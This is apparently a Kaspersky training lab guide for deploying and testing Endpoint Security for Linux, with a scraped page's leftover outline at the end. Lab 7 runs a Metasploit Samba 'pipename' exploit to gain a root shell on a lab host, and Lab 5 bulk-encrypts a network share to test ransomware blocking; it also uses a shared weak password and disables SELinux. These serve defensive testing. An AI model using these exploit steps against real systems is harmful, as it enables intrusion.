KL 013.11.4 en Labs v1.0

KL 013.11.
4: Kaspersky Endpoint Security for Linux
KL 013.11.4
Kaspersky
Endpoint Security
for Linux
Lab guide
1
KL 013.11.4: Kaspersky Endpoint Security for Linux
Table of contents
Lab 1. How to install Kaspersky Security Center Linux ................................................................................ 2
Task A: Install and configure MariaDB DBMS.................................................................................. 2
Task B: Configure the firewall ports and change the SELinux mode ............................................... 4
Task C: Install Kaspersky Security Center Linux ............................................................................. 5
Task D: Install Kaspersky Security Center Web Console ................................................................ 7
Lab 2. How to configure Kaspersky Security Center Linux ........................................................................... 9
Task A: Proceed through the Quick Start Wizard to configure KSC Linux ...................................... 9
Task B: Poll the network to discover devices .................................................................................14
Lab 3. Install Kaspersky Endpoint Security on the managed devices ........................................................15
Task A: Install Kaspersky Network Agent on devices ....................................................................15
Task B: Install Kaspersky Endpoint Security on the devices .........................................................17
Lab 4. How to manage devices ...................................................................................................................19
Task A: Create administration groups and distribute devices into them ........................................19
Task B: Create security policies for administration groups ............................................................22
Lab 5. Configuring server protection ...........................................................................................................25
Task A: Configure and test File Threat Protection .........................................................................25
Task B: Enable and test Web Threat Protection ............................................................................29
Task C: Enable Anti-Cryptor and test it ..........................................................................................31
Lab 6. How to collect information about executable files ............................................................................34
Lab 7. Test protection against vulnerability exploitation .............................................................................36
Task A: Prepare the target server for the attack ............................................................................36
Task B: Attack the system ..............................................................................................................36
Task C: Enable Web Threat Protection and repeat the attack .......................................................39
Task D: Enable File Threat Protection and repeat the attack ........................................................42
Lab 8. How to manage protection using kesl-control ..................................................................................45
Task A: Enable remote task management .....................................................................................45
Task B: Modify task settings using the terminal .............................................................................46
Task C: Create a new task using the terminal................................................................................47
1
KL 013.11.4: Kaspersky Endpoint Security for Linux
Lab 1.
How to install Kaspersky Security Center Linux
Scenario. You need to protect a network that consists of Linux computers with Kaspersky Endpoint Security for
Business. One Kaspersky Security Center is enough for a small network. Install a MariaDB database and
Kaspersky Security Center Administration Server on a dedicated computer running CentOS 8.
Contents. In this lab, we will:

A. Install and configure MariaDB DBMS
B. Configure ports in the firewall and disable SELinux
C. Install Kaspersky Security Center Linux
D. Install Kaspersky Security Center Web Console
Task A: Install and configure MariaDB DBMS

Install and configure a DBMS on the Kaspersky Security Center Linux server.
The workstation, KSC and dns machines must be powered on.
The task is performed on the workstation machine.
Log on to the workstation machine

Use the admin account and password Ka5per5Ky
Open an SSH connection to the KSC server:
— Run the terminal
— Carry out
ssh admin@ksc
— Enter the password Ka5per5Ky
If prompted to confirm the connection, type
yes and press ENTER
To get superuser privileges, carry out
sudo -i
Enter the password Ka5per5Ky
2
KL 013.11.4: Kaspersky Endpoint Security for Linux Lab 1.
Execute the command

dnf install mariadb-server
Confirm the installation
If prompted to confirm import of a GPG key,
type y and press Enter
Enter the following command to

— Enable automatic start of the MariaDB
service on system startup
— Start the MariaDB process right now
systemctl enable --now mariadb
Check the status of the MariaDB process
systemctl status mariadb
Log on to the MariaDB console

mysql -u root -p
Set password for the root user
ALTER USER ‘root’@’localhost’
IDENTIFIED BY ‘Ka5per5Ky’;
Create an account for Kaspersky Security
Center Linux
CREATE USER ‘kscadmin’ IDENTIFIED
BY ‘Ka5per5Ky’;
Carry out the following command to grant
the necessary permissions to the kscadmin
account
GRANT ALL PRIVILEGES ON *.* TO ‘kscadmin’;
Exit the MariaDB console
exit
Copy the MariaDB configuration file with the recommended parameters
cp /distr/my.cnf /etc/my.cnf
Restart the MariaDB service
systemctl restart mariadb
3
Task B: Configure the firewall ports and change the SELinux mode
Open ports required for Kaspersky Security Center Linux operation on the KSC server and disable SELinux to
prevent conflicts.
In the terminal with an ssh session to ksc, carry out the following command to open the required ports in the
firewall:
firewall-cmd --permanent --zone=public --add-port=13000/tcp --add-port=13000/udp
--add-port=17000/tcp --add-port=8080/tcp
Apply the new firewall settings

firewall-cmd --reload
Make sure the necessary ports are opened in the firewall
firewall-cmd --list-ports
Open the SELinux configuration file
nano /etc/selinux/config
Set SELINUX= to permissive
Press Ctrl+O, Enter to save the file
Press CTRL+X to close the file
Restart the server to apply the changes
reboot
4
Task C: Install Kaspersky Security Center Linux

Install Kaspersky Security Center Linux Administration Server.
Open an SSH connection to the KSC

server:
— Run the terminal
— Carry out
ssh admin@ksc
sudo -i
Create a group for the service account
groupadd kladmins
Create an unprivileged account with the primary group
kladmins
useradd ksc -g kladmins
Make sure the ksc user is included in the kladmins group
groups ksc
Start the installation of the KSC Linux
Administration Server
dnf install /distr/ksc64-14.2.0-
23324.x86_64.rpm

start
After the installation completes, run the KSC Linux post-installation script
/opt/kaspersky/ksc64/lib/bin/setup/postinstall.pl
5
Read and accept the end user

license agreement and privacy
policy
During the setup, specify the

following:
— Choose Administration
Server installation mode: 1
(standard)
— Enter Administration Server
DNS name or static IP
address: 10.28.0.20
— Enter Administration Server
SSL port number [13000]:
ENTER
— Define the approximate
number of devices that you
intend to manage: 1
— Enter security group name for
services: kladmins
— Enter the account name to
start Administration Server
service: ksc
— Enter the account name to
start other services: ksc
— Choose database type to

connect to: 1
— Enter the database address:
10.28.0.20
— Enter the database port:
3306
— Enter the database name:
kscdb
— Enter the database login:
kscadmin
— Enter the database
password: Ka5per5Ky
6
When services start, specify the

following:
— Enter the username: admin
— Password: Ka5per5Ky
— Repeat password:
Ka5per5Ky
Task D: Install Kaspersky Security Center Web Console

Install the Kaspersky Security Center Web Console component to manage Kaspersky Security Center Linux server
via its web interface.
In the terminal with an ssh session to the ksc server, copy the answer file for the web console installation to
the folder /etc
cp /distr/ksc-web-consle-setup.json /etc
Open the answer file for web console installation
nano /etc/ksc-web-console-setup.json
Read it
Start the web console installation

dnf install /distr/ksc-web-console-14.2.10359.x86_64.rpm
7
After the installation completes, restart all KSC services

systemctl restart KSC*
On the desktop, click the Activities button and launch

the Firefox browser
Type https://ksc:8080 in the address bar
When the warning appears, click Advanced and then
Accept the risk and continue
If you can see the Kaspersky Security Center logon
page, the installation has completed successfully
Conclusion
In this lab, we have configured the server and installed Kaspersky Security Center Linux on it.
We use MariaDB for the database in our labs, but you can use any other DBMS from the list of supported ones. If
you select another DBMS, consult the respective installation instructions. Different DBMS may require different
setup.
8
How to configure Kaspersky Security Center Linux
Lab 2.
Scenario. You have installed Kaspersky Security Center. Configure the server and poll the network to facilitate
protection deployment on the devices.

A. Configure the Administration Server
B. Poll the network to discover devices
Task A: Proceed through the Quick Start Wizard to configure KSC Linux
Proceed through the Quick start wizard to configure the KSC Linux Administration Server.
The ksc, dns, servera, serverb and workstation machines must be powered on.
Open the Kaspersky Security Center web

console at https://ksc:8080
Log on as admin with the password
Ka5per5Ky
The Quick start wizard opens immediately
after you log on. Click Start to proceed
For Internet connection, select Direct
connection and click Next
On the Assets to secure page, specify what

devices you plan to protect. Under Areas,
select Workstations, and under Operating
Systems, select Linux.
9
On the Encryption in solutions page,

select Lite encryption (AES56). This option
is designed for Windows devices only and is
displayed because you've selected to protect
Workstations.
In the next step, select plug-ins for the applications you plan to manage. This list is also drawn up depending
on the devices and operating systems you've selected to protect. Select Kaspersky Endpoint Security
11.4.0 for Linux.
Wait for the selected plug-ins to be installed.

Select the distributions to download: Kaspersky Network Agent for Linux x64 deb (English) and
Kaspersky Endpoint Security 11.4.0 for Linux (English).
10
Accept the Kaspersky Security Network statement for Kaspersky Security Center
On the Application activation page, select

Enter activation code
Type a code. Ask the trainer where to find it
Click Send
Select the checkbox Automatically distribute license key to managed devices
11
Click Next
Accept the Kaspersky Security Network statement for Kaspersky Endpoint Security Linux
On the basic network protection

configuration page, double-check the tasks
that will be active and confirm their creation
Wait for the tasks to be created and click
Next
On the notification setup page, under

Transport Layer Security usage and
version, select Do not use TLS and click
Next
Clear the checkbox Run protection

deployment wizard and click Finish to
complete the Quick Start Wizard.
12
Open Discovery and

Deployment |
Deployment &
assignment | Installation
packages
Switch to the tab In
progress
You will see the selected
installation packages. To
download them, accept
their license agreements
Click on the name of an
installation package
In the window that opens,

click Show EULA
Confirm that you accept the

terms of the license
agreement
Repeat this for each installation

package
After the download completes,
all installation packages will
appear on the Downloaded tab
13
Task B: Poll the network to discover devices

Poll the network to discover devices.
Open Kaspersky Security Center Web Console

Open Discovery and Deployment | Discovery | IP ranges
Click the Properties button
In the window that opens,

select Allow polling and
click the Save button
Click Start poll
Wait for the polling to

complete
Go to Discovery &
deployment | Unassigned
devices
Study the list of discovered
devices
Conclusion
You have completed initial setup and discovered devices on the network. In our lab environment, we could use IP
addresses to deploy protection and skip polling, but in a real network this would be inconvenient.
14
Install Kaspersky Endpoint Security on the managed devices
Lab 3.
Install Kaspersky Endpoint Security on the managed
devices
Scenario. Use the discovery results to install the Network Agent on the networked endpoints. As soon as all
Agents connect to the Administration Server, install Kaspersky Endpoint Security for Linux using the Network
Agent.

A. Install Kaspersky Network Agent on devices
B. Install Kaspersky Endpoint Security on the devices
Task A: Install Kaspersky Network Agent on devices

Install Kaspersky Network Agent on the discovered devices remotely.

Open Discovery and Deployment |
Deployment & assignment | Protection
deployment wizard
Select Kaspersky Network Agent for Linux
x64 deb (English) and click Next
On the following page, select Do not add license key to installation package and click Next
15
On the next page, choose Select devices for

installation | Devices and expand the
Unassigned devices list, which contains all
discovered devices
Select the servera and serverb devices and
click Next
On the task settings page,

rename the task Network
Agent installation and click
Next
On the next page, select Do

not move devices and click
Next
When prompted for an

account, select Account
required (Network Agent is
not used), click +Add, enter
Account: root, Password:
Ka5per5Ky, click OK and
then Next
16
On the installation
start page, select
the checkbox Run
the task after the
wizard finishes
and click Next
Go to Devices |
Tasks and wait for
the installation to
complete
Task B: Install Kaspersky Endpoint Security on the devices

Remotely install Kaspersky Endpoint Security on the discovered devices.
Open Discovery and

Deployment | Deployment &
assignment | Protection
deployment wizard
Select Kaspersky Endpoint
Security 11.4.0 for Linux and
click Next
On the following page, select Do not add license key to installation package and click Next
Select Kaspersky Network Agent for Linux

x64 deb (English) and click Next
17
On the next page, choose Select devices for

installation | Devices and expand the
Unassigned devices list, which contains all
discovered devices
Select the servera and serverb devices and
click Next
In the task settings

window, rename the
task Kaspersky
Endpoint Security
installation and click
Next
On the next page,

select Do not move
devices and click Next
On the next page, select No account required, because

the Network Agent is already installed on the servers.
Click Next
On the next page, select

the checkbox Run the
task after the wizard
finishes and click Next
18
How to manage devices
Go to Devices | Tasks
and wait for the
installation to complete
Open Discovery and

Deployment |
Unassigned Devices
and check the Network
Agent is installed and
Protection status
columns
Conclusion
You have installed Network Agent and then Kaspersky Endpoint Security on the networked devices. The devices
are protected now. Next, you should configure protection.
Lab 4.
Scenario. You have installed Kaspersky Endpoint Security on the network computers. As different devices may
require different security settings, you need to organize them into administration groups and create a security policy
for each group.

A. Create administration groups and distribute devices into them
B. Create security policies and assign them to administration groups
Task A: Create administration groups and distribute devices into them

Create two administration groups. Configure automatic distribution rules.
Open the Kaspersky Security Center web console at https://ksc:8080

Log on as admin with the password Ka5per5Ky
19
Open Devices | Hierarchy of Groups

Select the group Managed devices and click
+ Add
Name the group Group A and click Add

Create Group B in a similar manner
Go to Devices | Moving rules

Click the Add button
Name the rule Move to A

For the Administration group, select
Group A
For Apply rule, select Run once for each
device
Select the checkboxes Move only devices
that do not belong to an administrative
group and Enable rule
Switch to the Rule Conditions tab

Open the Network subtab, select the IP
range option and specify the following
values: From: 10.28.0.1 To: 10.28.0.30
Switch to the Applications subtab

For the Network Agent is installed
condition, select Yes
20
Click the Save button

Click the Add button
Name the rule Move to B
For the Administration group, select
Group B
For Apply rule, select Run once for each
device
Select the checkboxes Move only devices
that do not belong to an administrative
group and Enable rule
Switch to the Rule Conditions tab

Open the Network subtab, select the IP
range option and specify the following
values: From: 10.28.0.31 To: 10.28.0.60
For the Network Agent is installed

condition, select Yes
Click the Save button
In the Devices | Moving rules section, select the checkbox next to the rule Move to A, click the three-dot
menu in the upper right corner and select Enforce enabled rule
In the window that opens, under Specify

group to run the rule, select Unassigned
devices and click Enforce rule
Repeat the same steps for the rule Move

to B
When the rules are applied, you will see
the respective message
21
Open Devices | Managed devices

Check which groups the devices belong to now
Task B: Create security policies for administration groups

Create security policies and assign them to administration groups.
Open Kaspersky
Security Center
Web Console
Go to Devices |
Policies &
Profiles
To create a new
security policy,
click the button
+ Add
Select the application to create the policy for:

Kaspersky Endpoint Security 11.4.0 for Linux
and click Next
Accept the
Kaspersky Security
Network Statement
and click Next
22
On the following
page, rename the
policy Group A
policy, set its status
to Inactive, disable
the option Inherit
settings from
parent policy and
click Save
Create another
policy in a similar
manner and name
it Group B policy
Select the
checkbox next to
Group A policy
and on the three-
dot menu in the
upper right corner,
click Move
23
In the administration group

selection window, expand the
Managed devices group, select
Group A and click Move
Confirm moving the policy
Open Group A policy, change its

status to Active and click Save
Move Group B policy to Group B

in a similar manner
Activate Group B policy
Make sure the policies are active

and belong to their appropriate
groups
Conclusion
You have set up automatic device grouping and created security policies for all groups.
24
Configuring server protection
Lab 5.
Scenario. You have created security policies for managed devices. Configure the components that will efficiently
protect the system.
A. Configure file protection

B. Configure protection against web threats
C. Configure protection against encryption
Task A: Configure and test File Threat Protection

Make sure file threat protection is enabled and exclude from scanning directories and files that must not be
scanned for performance reasons. Make sure File Threat Protection works correctly.
The ksc, dns, servera, serverb, kali and workstation machines must be powered on.

Go to Devices | Policies & Profiles
Open Group A policy
Switch to the Application

settings tab
In the Essential threat
protection section, open File
threat protection
Make sure file threat protection

is enabled
Return to the application

settings and open Scan
exclusions
Under Exclusion scopes, click
Configure exclusions
25
In the window that opens, click

+ Add
Configure exclusions for directories

with MariaDB data:
— Exclusion scope name:
MariaDB data directory
— File system, access protocol and
path: local
— Path: /var/lib/mysql
— Mask: *
Click OK to save the settings
Click OK to return to the exclusion

settings
In the Exclusions by mask area,
click Configure exclusions by
mask
Click + Add to create a mask
Specify the *.log mask to exclude all

log files from scanning
Click OK to save the mask
Click OK to return to the exclusion settings
Click OK again to return to the application settings
Click Save
26
Switch to the Terminal on the workstation machine

Connect to servera
ssh servera
Download the eicar test file
curl https://www.eicar.org/download/eicar.com.txt -o /tmp/eicar.com.txt
Check if the
downloaded file is
in the folder
ls /tmp
You can see that
the eicar.com.txt
file is not there

Open Monitoring
& Reporting |
Event Selections
Open the Recent
events selection
Find the detection
events
Threat detected, Object not disinfected and Object deleted events pertain to File Threat Protection response
to downloading the malicious file
Open these events and study the details

The Task name field shows which task
detected the threat, and the Description
field provides more detailed information
about the detection
27
Close the event selection

The file was deleted by file threat
protection. A backup copy of each
deleted file is saved in case it is a
false positive. You can find it in
Operations | Repositories | Backup
You can download a backup copy,
restore the file or send it to
Kaspersky
28
Task B: Enable and test Web Threat Protection

Enable Web Threat Protection and try to download a malicious file from the internet.

Open Group A policy
Switch to the Application settings tab
In the Essential threat
protection section, open
Web threat protection
Enable Web threat
protection and click OK to
exit
Click Save to save the modified policy
Switch to the Terminal on the workstation machine
Connect to servera
ssh servera
curl https://www.eicar.org/download/eicar.com.txt -o /tmp/eicar.com.txt
Check if the downloaded

file is in the folder
ls /tmp
This time, the file

eicar.com.txt is there
View the file contents
less
/tmp/eicar.com.txt
29
Kaspersky Endpoint Security has replaced the contents of the original eicar.com.txt file
Open Monitoring & Reporting | Event Selections
Open the Recent events selection
You will find the Threat detected and Website blocked events there. The former informs about the
detected threat, and the latter, about blocked connection to the website from which the file was downloaded
Open both events and read

their contents
The Task name field
shows which component
detected the threat, and the
Description field provides
more detailed information
about the detection
Close the event selection
30
Task C: Enable Anti-Cryptor and test it

Enable protection against encryption and try to encrypt files in a shared folder
Start the task on the workstation machine.

Open Group A policy
In the Advanced Threat Protection section, click Anti-Cryptor
Enable Anti-Cryptor and click OK to exit

Click Save to save the modified policy
Switch to the kali computer.
Log on as kali with the password Ka5per5Ky

Open a Terminal window
sudo -i
and enter the password Ka5per5Ky
Mount a network share of servera to a local directory
mount -t cifs -o rw //10.28.0.30/share /mnt/share01
When prompted for the password to mount the network folder, press Enter
31
Check if files have appeared in the folder

ls /mnt/share01
Encrypt files in the network folder

aescrypt -e -p encrypted /mnt/share01/*
The process will not be completed because Kaspersky Endpoint Security will block the host
Press Ctrl+C to stop encryption
Switch to the workstation computer.

Pay attention to the Anti-Cryptor events: Encryption detected and Host blocked
View the event details
32
Switch to the terminal and connect to host servera

ssh servera
sudo -i
Display the list of files in the directory that has been encrypted
ls /usr/share/share01
Notice that an encrypted file with the .aes extension has appeared among other files. At the same time, the
encryption application failed to delete the original file because Anti-Cryptor prevented this
Also notice that Anti-Cryptor blocked the host from which encryption was attempted. The default blocking
time is 30 minutes.
Conclusion
You have set up protection against encryption, file and web threats and tested how each of these protection
components works.
33
How to collect information about executable files
Lab 6.
Scenario. You have configured the main protection components. Now, increase network visibility. Kaspersky
Endpoint Security for Linux can collect information about executable files on the endpoint and send it to Kaspersky
Security Center. This will give the administrator a complete picture of the executable files on the network endpoints.
Contents. In this lab, we will inventory the system to get a list of available executable files.

Go to Devices | Tasks
To create a new task, click + Add
Specify the following task parameters:

— Application: Kaspersky Endpoint
Security 11.3.0 for Linux
— Task type: Inventory scan
— Task name: Inventory scan
— Select devices to which the task will be
assigned: Assign task to
administration group
Click Next
Expand the Managed devices group and select Group A
Click Next
34
Select the checkbox Open task details when creation is complete and click Finish
After the configuration completes, the task details will open. Switch to the Application settings tab
Check the Inventory scan scope. It must be enabled and contain the path /usr/bin
Exit the task details to see the list of all created tasks
Find the Inventory scan task, select the respective checkbox and click Start to run the task
Wait for the task status to change to Completed successfully / 100%
Go to Operations | Third-party applications | Executable files. You can see the list of all executable files
that have been found in the /usr/bin directory
Conclusion
You have understood how to collect data for audit.
35
Test protection against vulnerability exploitation
Lab 7.
Scenario. Act as an attacker to test how the protection components work. There is a computer with a known
vulnerability on the network. Get access to the computer, load a malicious file. Next, activate the protection
components one by one and observe at what stages the attack will be detected.

A. Prepare the target server for the attack
B. Launch an attack on an unprotected server
C. Enable Web Threat Protection and repeat the attack
D. Enable File Threat Protection and repeat the attack
Task A: Prepare the target server for the attack

Deactivate all protection components on the target server.
The ksc, dns, servera, serverb, kali and workstation machines must be powered on.

Open Group B policy
In the Essential threat protection section, open File Threat Protection
Disable it and click OK
Open Web Threat Protection

Disable it and click OK
Click Save
Task B: Attack the system

Use an exploit to gain access to the system and download a pseudo-malicious file.
36
Start the task on the kali machine.
Log on to the kali server

— Login: kali
Run the terminal
Run Metasploit
msfconsole
Find the exploit samba is known pipename
search pipename
Select the found exploit

use 0
Check the exploit settings

show options
37
For RHOSTS, specify the target server address

set rhosts 10.28.0.31
Run the exploit

exploit
The message Common shell session 1 opened means that a session with root permissions has been opened
Proceed with sending commands in this console

wget https://www.eicar.org/download/eicar.com.txt
Disconnect from the attacked host

exit
Close the Metasploit console
exit
38
Task C: Enable Web Threat Protection and repeat the attack

Enable Web Threat Protection and check if the attack succeeds.

Open Group B policy
In the Essential threat protection section, open Web Threat Protection
Enable it
Click OK to save and exit the Web Threat Protection settings
Click Save
Proceed with the task on the kali machine.

— Login: kali
Run the terminal
Run Metasploit
msfconsole
search pipename

use 0
39

show options
For RHOSTS, specify the

target server address
Run the exploit
exploit
The message Common shell session opened means that a session with root permissions has been opened
Proceed with sending commands in this console

wget https://www.eicar.org/download/eicar.com.txt
40
Web threat protection blocked download of the test file

Roll back the changes using the script
/root/finish.sh
Disconnect from the attacked host
exit
exit
Proceed with the task on the workstation machine.

Pay attention to the Threat detected and Access to website blocked events. Web Threat Protection
generated these events when it detected that the test file was being downloaded
Read the events
41
Task D: Enable File Threat Protection and repeat the attack


Open Group B policy
In the Essential threat protection section, open File Threat Protection
Enable it
Click OK to save and exit the Web Threat Protection settings
Click Save
Proceed with the task on the kali machine.

— Login: kali
Run the terminal
42
Run Metasploit
msfconsole
search pipename

use 0

show options
For RHOSTS, specify the target server address

43
Run the exploit

exploit
The exploit has failed to open a session

exit
Proceed with the task on the workstation machine.

Pay attention to the Object detected and Threat detected events. File Threat Protection generated these
events when it detected a backdoor attack
Read the events
Conclusion
You have carried out a vulnerability exploitation attack and studied the components that can repel or detect such an
attack at different stages.
44
How to manage protection using kesl-control
Lab 8.
Scenario. There are several Linux computers in a small isolated segment of ABC Inc. network. It is impractical to
install Kaspersky Security Center in this segment, and you manage security using scripts and the kesl-control
utility.

A. Enable remote management
B. Modify task settings using the terminal
C. Create a new task using the terminal
Task A: Enable remote task management

By default, Kaspersky Security Center blocks the ability to manage settings locally; let’s disable this blocking first of
all.
The ksc, dns, servera and workstation machines must be powered on.

Open Group A policy
In the Essential threat protection section, open Network Threat Protection
Set all switches from Enforced to Undefined
Click Save
45
Task B: Modify task settings using the terminal

Open the terminal and connect to servera

ssh servera
sudo -i
Display the list of tasks
kesl-control --get-task-list
If the Network Threat Protection task is Started, stop it

kesl-control --stop-task network_threat_protection
or
kesl-control --stop-task 17
Output the current settings of the Network

Threat Protection task
kesl-control --get-settings 17
46
Let's modify the task settings:

— Action on threat detection: Inform
— Block attacking host for: 30 minutes
— Trusted IP addresses: 10.28.0.31
To do so, enter the following command:
kesl-control --set-settings 17 ActionOnDetect=notify BlockDurationMinutes=30
UseExcludeIPs=yes ExcludeIPs.item_0000=10.28.0.31
Output the current settings of the Network Threat Protection task
Run the Network Threat Protection task

kesl-control --start-task 17
Task C: Create a new task using the terminal

Create an Inventory task and modify its settings using the terminal. Run the task and check the result.
By default, Kaspersky Security Center prohibits users from creating tasks using kesl-control. Let’s allow task
creation

Open Group A policy
In the Local Tasks section, open Task
management
Select the checkbox Allow users to

view and manage local tasks
Click Save
Open the terminal and connect to servera
ssh servera
47
Create a new Inventory task

kesl-control --create-task Inventory --type InventoryScan
Your task ID may differ. We’ll use it to manage the task in our commands; use the number that you have
received when creating the task
Display the list of tasks; you will see the created task on the list
kesl-control --get-task-list
Output the current task settings

Add the /bin area to the inventory settings. To do so, enter the following command:
kesl-control --set-settings 166 ScanScope.item_0001.UseScanArea=yes
ScanScope.item_0001.Path=/bin
Output the current settings of the Inventory task
View the inventory task schedule

kesl-control --get-schedule 166
48
The task start schedule is set to manual mode. Add automatic start every Saturday
kesl-control --set-schedule 166 RuleType=weekly RunMissedStartRules=yes
StartTime=’13:00:00;Sat’ RandomInterval=60
View the inventory task schedule
kesl-control --get-schedule 166
Start the inventory manually

kesl-control --start-task 166
Check the task state
kesl-control --get-task-state 166
Display the list of executable files detected by the Inventory task on the screen
kesl-control --get-app-list
Conclusion
You have reconfigured an existing task and created a new one from scratch remotely. You can use this
functionality to automate Kaspersky Endpoint Security for Linux tasks where Kaspersky Security Center cannot be
used.
v1.0
49

KL 013.11.4 en Labs v1.0

Uploaded by

Copyright:

Available Formats

You might also like

KL 013.11.4 en Labs v1.0

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

KL 013.11.4 en Labs v1.0

Uploaded by

Copyright:

Available Formats

KL 013.11.

4: Kaspersky Endpoint Security for Linux

Contents. In this lab, we will:

Task A: Install and configure MariaDB DBMS

The workstation, KSC and dns machines must be powered on.

The task is performed on the workstation machine.

Log on to the workstation machine

Execute the command

Enter the following command to

Log on to the MariaDB console

The task is performed on the workstation machine.

Apply the new firewall settings

Task C: Install Kaspersky Security Center Linux

The task is performed on the workstation machine.

Open an SSH connection to the KSC

Confirm the installation

Read and accept the end user

During the setup, specify the

— Choose database type to

When services start, specify the

Task D: Install Kaspersky Security Center Web Console

The task is performed on the workstation machine.

Start the web console installation

Confirm the installation

After the installation completes, restart all KSC services

On the desktop, click the Activities button and launch

Contents. In this lab, we will:

The task is performed on the workstation machine.

Open the Kaspersky Security Center web

On the Assets to secure page, specify what

On the Encryption in solutions page,

Wait for the selected plug-ins to be installed.

On the Application activation page, select

Select the checkbox Automatically distribute license key to managed devices

On the basic network protection

On the notification setup page, under

Clear the checkbox Run protection

Open Discovery and

In the window that opens,

Confirm that you accept the

Repeat this for each installation

Task B: Poll the network to discover devices

The task is performed on the workstation machine.

Open Kaspersky Security Center Web Console

In the window that opens,

Click Start poll

Wait for the polling to

Contents. In this lab, we will:

Task A: Install Kaspersky Network Agent on devices

The task is performed on the workstation machine.

Open Kaspersky Security Center Web Console

On the next page, choose Select devices for

On the task settings page,

On the next page, select Do

When prompted for an

Task B: Install Kaspersky Endpoint Security on the devices

The task is performed on the workstation machine.

Open Discovery and